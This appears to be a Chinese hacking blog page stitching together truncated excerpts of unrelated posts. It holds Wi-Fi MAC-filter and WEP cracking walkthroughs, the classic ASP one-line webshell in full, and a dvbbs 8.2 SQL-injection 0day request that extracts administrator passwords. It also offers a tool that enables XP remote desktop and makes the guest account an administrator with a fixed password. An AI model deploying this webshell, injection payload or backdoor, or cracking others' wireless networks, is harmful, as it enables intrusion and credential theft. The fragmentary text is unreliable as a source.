永佳博客

首先要找到WildPackets AiroPeek NX软件所支持监测无线网卡详细型号列表：http://www.wildpackets.com/support/downloads/drivers。并下载相应的WildPackets AiroPeek NX所定制的驱动程序。将驱动更改为所定制的驱动程序。测试目的：破解无线过滤MAC测试系统：WinXP SP2无线网卡：Cisco AIR-CB21A

试验环境
ap：d-link 724 （没有任何有线和无线连接）
os：windows
网卡：atheros 驱动版本为commview 4.2.2.104
下面的操作在windows下linux下原理相同
第一步 （打开监视模式）
airserv-ng -c 1 -d "commview.dll|debug"
-c 1 (监视通道1)

首先回顾一下以前ASP一句话的经典木马吧！

<%if request("nonamed")<>"" then execute request("nonamed")%>

VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的！网上也有例子我就不多说了！.....

然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了！

南方数据、良精、网软天下等企业管理系统漏洞总结

漏洞描述：

中国应用最广泛的论坛程序，最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号，导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。

漏洞等级：

高危

漏洞分析：

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
...

为避免本文成为百科全书，一些常用的术语不再解释，如 AP、WEP、ARP等。实在不明白，可 GOOGLE 或向网友请教。所需硬件：带无线网卡电脑一台所需软件：Auditor CD、aircrack 2.2注意事项：无线网卡由于各种网卡采用的芯片不同，可能某些功能未能实现。推荐 Prism 2 或 Atheros 芯片。小黑内置的无线网卡通常有两种：Intel 或 IBM。IBM 用的就是 Athe

       写在前面的话：前面在论坛发了个《帖子分享成功的快乐》http://www.anywlan.com/bbs/dispbbs.asp?boardID=15&ID=6619&page=1，看到很多朋友热心回帖，版主也给了奖励，心中煞是感动，我在破解过程的很多问题都是在anywlan论坛得到解决的，也总想着如何回报论

WEP 密码破解教程 BT3 使用 （原创技术化） 本教程，目的是让大家可以了解破解无线网络的方式，从而加强自己的网络安全性。请不要用于非法目的。另外，在互联网上，有太多的方法知道你是谁，不要以为用别人的AP就没人找得到你哦。这里是一个较为详细的BT3  Backtrack 3 破解无线网WEP的一个教程。首先http://wiki.remote-exploit.or

很早时候写的,方便大家用,代码丢了我也可以百度到编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组并且可以多用户登录 xp3389_bin.rar (107.16 KB)xp3389_src.rar (202.54 KB)